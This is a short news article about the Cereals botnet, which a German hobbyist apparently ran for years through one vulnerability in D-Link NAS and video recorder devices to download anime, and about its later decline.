A hacker launched a consistent eight-year attack on D-Link’s NAS and NAV. The attacker hijacked the botnet only to download anime videos.
A recent report says that a hacker continuously attacked the NVRs (network video recorders) and NAS (network-attached storage) from D-Link. Authorities discovered that the attack purely targeted anime videos downloading.
The man behind the attack
Reports identify the attacker as a certain Stefan, a German national. Aside from the name and nationality, reports did not have further details about the hacker.
Researchers handling the case named the hacker as Cereals botnet. Cereals managed to operate the massive attack bypassing cyber-security detection.
Cereals botnet first launched its attack in 2012 and reached its peak in 2015. Three years after it started its operation, the botnet caught the attention of the cybersecurity world when it accumulated 10,000 bots.
How the hacker launched the botnet attack
Using the D-Link as its platform, Cereals scanned all possible vulnerabilities. Finding an opportunity on NAS and NAV, it installed a malware on the said avenues.
Cereals exploited a vulnerability that provided access to a device’s built-in server. Operating on root privileges, the botnet attacker sent counterfeit HTTP requests to execute commands on the said device.
Assessing its capability, experts classify Cereals in the advanced type. It could access and maintain four backdoor mechanisms.
Aside from the multiple access to its infected devices, Cereals also prevented other hackers from getting into the system it is working at. It did so by patching the systems and closing all entry points.
The botnet even gained and secured access to twelve smaller subnets. There, Cereals handled its infected bots. Experts find it unusual that despite its strength and capability, Cereals exploited only one vulnerability. Such botnet characteristics had the potential to expand beyond D-Link.
Cereals also could access the user sensitive data stored in D-Link NAS and NAV. The botnet even had the potential to launch a DDoS attack, which it did not execute.
Given all the potentials and capabilities, yet staying on anime video downloading access lead the researchers to one conclusion. They believed that Cereals botnet is purely a project for a hobby.
At this point, Cereals begin to diminish slowly. In the winter of 2019, Cr1ptT0r, a ransomware strain, began to clean up all the Cereals malware from D-Link.
Cereals botnet status
Owners are slowly dismantling their D-Link that served as a hub for Cereals. The said platform is aging as well, contributing to Cereals decline.
Forcepoint, the research team handling Cereals, recently released a report about botnet’s exploitation. Rumors now surface that the release of the said report could mitigate another hacker botnet attack.
Image courtesy of Alan Isherwood/Flickr